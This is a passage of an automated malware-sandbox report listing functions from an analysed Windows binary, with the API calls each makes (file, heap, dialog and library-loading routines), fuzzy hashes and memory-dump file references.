Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDGu<|
API String ID: 1269201914-3487047276
Opcode ID: fcc0fa0f37f3fecb1c9d27c93f5f19345ab5dd826d2d1ef50eee9f1aeda82340
Instruction ID: acb0bee0d262d41566fbb7c3282e333b51444ab8de76a15345a151b775b9c402
Opcode Fuzzy Hash: fcc0fa0f37f3fecb1c9d27c93f5f19345ab5dd826d2d1ef50eee9f1aeda82340
Instruction Fuzzy Hash: D6A001DA6AAA82BC310962566D0AE3F276DC4CAF65370A92EF81684481A8881C561871

Function 007CE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDGu<|
API String ID: 1269201914-3487047276
Opcode ID: f1fc965e507d6be45eadcb870181707bf9c21dd8c0f846c2e04f74d5ff0d7f1f
Instruction ID: acb0bee0d262d41566fbb7c3282e333b51444ab8de76a15345a151b775b9c402
Opcode Fuzzy Hash: f1fc965e507d6be45eadcb870181707bf9c21dd8c0f846c2e04f74d5ff0d7f1f
Instruction Fuzzy Hash: D6A001DA6AAA82BC310962566D0AE3F276DC4CAF65370A92EF81684481A8881C561871

Function 007CE555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDGu<|
API String ID: 1269201914-3487047276
Opcode ID: 86690aa4469d599519e460706e8401193b30a3b544cf7b5990aec608eb7b501a
Instruction ID: acb0bee0d262d41566fbb7c3282e333b51444ab8de76a15345a151b775b9c402
Opcode Fuzzy Hash: 86690aa4469d599519e460706e8401193b30a3b544cf7b5990aec608eb7b501a
Instruction Fuzzy Hash: D6A001DA6AAA82BC310962566D0AE3F276DC4CAF65370A92EF81684481A8881C561871

Function 007CE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDGu<|
API String ID: 1269201914-3487047276
Opcode ID: a2613d71ee0105ba3d1a8b1582dff180a7495e329714031418f6a5549c61a192
Instruction ID: acb0bee0d262d41566fbb7c3282e333b51444ab8de76a15345a151b775b9c402
Opcode Fuzzy Hash: a2613d71ee0105ba3d1a8b1582dff180a7495e329714031418f6a5549c61a192
Instruction Fuzzy Hash: D6A001DA6AAA82BC310962566D0AE3F276DC4CAF65370A92EF81684481A8881C561871

Function 007DBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 007DB7BB: GetOEMCP.KERNEL32(00000000,?,?,007DBA44,?), ref: 007DB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007DBA89,?,00000000), ref: 007DBC64
GetCPInfo.KERNEL32(00000000,007DBA89,?,?,?,007DBA89,?,00000000), ref: 007DBC77

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: d7a8c1bc42d19a271d0833fcaf90092341da5a0e0961be9dff37f29d2702f6b4
Instruction ID: 34f6f21352f840a436c182499ae7acc8077ef6e5e61f837684e3654277a97736
Opcode Fuzzy Hash: d7a8c1bc42d19a271d0833fcaf90092341da5a0e0961be9dff37f29d2702f6b4
Instruction Fuzzy Hash: EB511270A00245DEDB208F75C885ABABBF6EF45310F1A446FD4968B352DB3D9945CBA0

Function 007B9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,007B9A50,?,?,00000000,?,?,007B8CBC,?), ref: 007B9BAB
GetLastError.KERNEL32(?,00000000,007B8411,-00009570,00000000,000007F3), ref: 007B9BB6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8b21e8320468710e8af2766a6a5e05b7868b4cdb2028ffbdfabb054348483ea1
Instruction ID: 351fc37d8f60dc3ebbbd97a7f0947748b0d50935cdc26d79aa73a311ebf876af
Opcode Fuzzy Hash: 8b21e8320468710e8af2766a6a5e05b7868b4cdb2028ffbdfabb054348483ea1
Instruction Fuzzy Hash: 6641DFB1504341CFDB24DF15E584AABB7E6FFD8320F148A2DEBA183260E778ED048A51

Function 007B1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B1E55

Part of subcall function 007B3BBA: __EH_prolog.LIBCMT ref: 007B3BBF

_wcslen.LIBCMT ref: 007B1EFD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: ceec688a46675811149059c93d0ca885e3e5ed1f839bbc207288d6ecfb343594
Instruction ID: 37c37218b0e09362a7bbaab77652893e391f47110412fde11ef1502ad5c0f2b6
Opcode Fuzzy Hash: ceec688a46675811149059c93d0ca885e3e5ed1f839bbc207288d6ecfb343594
Instruction Fuzzy Hash: 9B314A71905209DFCF11DF98C959AEEBBF5AF18300F9000AEF445A7251CB3A9E10CB60

Function 007B9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007B73BC,?,?,?,00000000), ref: 007B9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 007B9E70

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 2013544105739e790e7e7b12890f68b4419c47742e8d85089e79cb87ec9036e0
Instruction ID: f8abb4fb3cb7636b226b0eafcf58b11b1c559ab2ed84cbd1c2378c70aede0d46
Opcode Fuzzy Hash: 2013544105739e790e7e7b12890f68b4419c47742e8d85089e79cb87ec9036e0
Instruction Fuzzy Hash: E221EE32248285EBC714CF35C895BAABBE4AF55304F08491DF6E587541D32CE90C8BA1

Function 007B966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,007B9F27,?,?,007B771A), ref: 007B96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,007B9F27,?,?,007B771A), ref: 007B9716

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 287e124ec40d3f8a2fbfd8465ed833191d285284375278a7c783937652fc54c1
Instruction ID: b648927a35144b023d9dfb9793f2f5209e3c90d9e5fa414d201f5c5e3af207ec
Opcode Fuzzy Hash: 287e124ec40d3f8a2fbfd8465ed833191d285284375278a7c783937652fc54c1
Instruction Fuzzy Hash: 1621B071100744AEE3308A65CC89FF777DCEB49324F104A19FBA5C61D1C778A8848671

Function 007B9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 007B9EC7
GetLastError.KERNEL32 ref: 007B9ED4

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 716a2df244141bbde8b2ab020a665cc8a47397c8db088653a99ee42762e6bdb7
Instruction ID: a5e5960c4cb5185c4fafbe9014fc32ec3a5abda649fc3e315085a607f03f9489
Opcode Fuzzy Hash: 716a2df244141bbde8b2ab020a665cc8a47397c8db088653a99ee42762e6bdb7
Instruction Fuzzy Hash: 1F118232600604EBE724C629C885BF6B7E9AB49370F904A29E762D26D0D778ED45C660

Function 007D8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007D8E75

Part of subcall function 007D8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007DCA2C,00000000,?,007D6CBE,?,00000008,?,007D91E0,?,?,?), ref: 007D8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,007F1098,007B17CE,?,?,00000007,?,?,?,007B13D6,?,00000000), ref: 007D8EB1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 5b360d7735ee040a857fa3cbe0ad1ab351a44abdf451ddfc9ef99bc9c6b9ebde
Instruction ID: 2c6bcab87648362b89caa6e7a4f97fb77c89602d10e0b74e237b87386570b2a0
Opcode Fuzzy Hash: 5b360d7735ee040a857fa3cbe0ad1ab351a44abdf451ddfc9ef99bc9c6b9ebde
Instruction Fuzzy Hash: CFF0C232601115A6CBA17B259C09F6F377C9FC1B70F244127F918AA391DF7C8D0089A3

Function 007C109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 007C10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 007C10B2

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 1e8a2a38e2f608f5823c411d7dea3b1a46e953da1ee39a465eeab393ceeefacd
Instruction ID: f151524c14260ef224552f2ead2b19d6bed1eba25cb9af5d27b4a840bdc60c97
Opcode Fuzzy Hash: 1e8a2a38e2f608f5823c411d7dea3b1a46e953da1ee39a465eeab393ceeefacd
Instruction Fuzzy Hash: BBE0D832B00185A7CF098BB49C19EEB73DEEA4534431081BDE403D7202F938DE818A60

Function 007BA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007BA325,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA501

Part of subcall function 007BBB03: _wcslen.LIBCMT ref: 007BBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007BA325,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA532

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 1abd066bb802583a5506eb2fece608fccc571e0eae60601a07602bc60477e0cf
Instruction ID: 2427773cfdfd33ffec7dc3a1f58e71c7c16f96abd97584e14905f699fbc2d4be
Opcode Fuzzy Hash: 1abd066bb802583a5506eb2fece608fccc571e0eae60601a07602bc60477e0cf
Instruction Fuzzy Hash: F3F0E532200149BBDF116F60DC49FEA37ADAF08385F448051BC45D6160DB75CBD4EB10

Function 007BA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,007B977F,?,?,007B95CF,?,?,?,?,?,007E2641,000000FF), ref: 007BA1F1

Part of subcall function 007BBB03: _wcslen.LIBCMT ref: 007BBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,007B977F,?,?,007B95CF,?,?,?,?,?,007E2641), ref: 007BA21F

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: f1ded53a4b6b1f999c1d9a80e7425b6dc86572dc7d01551cb7ad4c4158023107
Instruction ID: e9c75b0dc1c9751b6a35e12d7b124d3afae306b78457d4da6d4754ccc83d00f4
Opcode Fuzzy Hash: f1ded53a4b6b1f999c1d9a80e7425b6dc86572dc7d01551cb7ad4c4158023107
Instruction Fuzzy Hash: E1E0D831141209BBEB01AF60DC49FEA375CBF0C3C1F484025B945D6051EB79DEC4DA64

Function 007CAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,007E2641,000000FF), ref: 007CACB0
CoUninitialize.COMBASE(?,?,?,?,007E2641,000000FF), ref: 007CACB5

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: cae98feb5e740f7ddc1eba286e5735eaafe5642e8c5ef8ae64b9f6f36cb7c161
Instruction ID: e57eace33805a9d1e60e8fe9ba267022ae3be23edc57118e3d999910c34f1545
Opcode Fuzzy Hash: cae98feb5e740f7ddc1eba286e5735eaafe5642e8c5ef8ae64b9f6f36cb7c161
Instruction Fuzzy Hash: 34E06572604650EFC7009F59DC46F55FBACFB48B20F044369F416D3760CB786801CA94

Function 007BA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,007BA23A,?,007B755C,?,?,?,?), ref: 007BA254

Part of subcall function 007BBB03: _wcslen.LIBCMT ref: 007BBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,007BA23A,?,007B755C,?,?,?,?), ref: 007BA280

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 7ecb0d72fbe2ad084d99f95d5a5d23d6098b91144d21af92ca8e3beb40654fc1
Instruction ID: 86b56c785ffc41b3ed38d67b23fd1cddcc8540f92feb68619c2d81b5b8c1ee1b
Opcode Fuzzy Hash: 7ecb0d72fbe2ad084d99f95d5a5d23d6098b91144d21af92ca8e3beb40654fc1
Instruction Fuzzy Hash: EDE09232500124ABCB60AB64CC0DBD97758AB0C3E1F044261FD45E71D0D778DE44CAA4

Function 007CDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007CDEEC

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

SetDlgItemTextW.USER32(00000065,?), ref: 007CDF03

Part of subcall function 007CB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007CB579
Part of subcall function 007CB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007CB58A
Part of subcall function 007CB568: IsDialogMessageW.USER32(0001048C,?), ref: 007CB59E
Part of subcall function 007CB568: TranslateMessage.USER32(?), ref: 007CB5AC
Part of subcall function 007CB568: DispatchMessageW.USER32(?), ref: 007CB5B6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 2989e1cce12575a43bd297c20193d421cf7c7fe0b81b8e8cf8e87be71efec0b3
Instruction ID: 56d1877fd76f07f502722c9a23c4bec6ca076a7378645a6d740a2334adfcfc32
Opcode Fuzzy Hash: 2989e1cce12575a43bd297c20193d421cf7c7fe0b81b8e8cf8e87be71efec0b3
Instruction Fuzzy Hash: 4CE092B2500288A6DF02AB64DC0AFFE3BAC5B05785F044955B601DA1A3DA7CEA108666

Function 007C081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007C0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007BF2D8,Crypt32.dll,00000000,007BF35C,?,?,007BF33E,?,?,?), ref: 007C0858

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
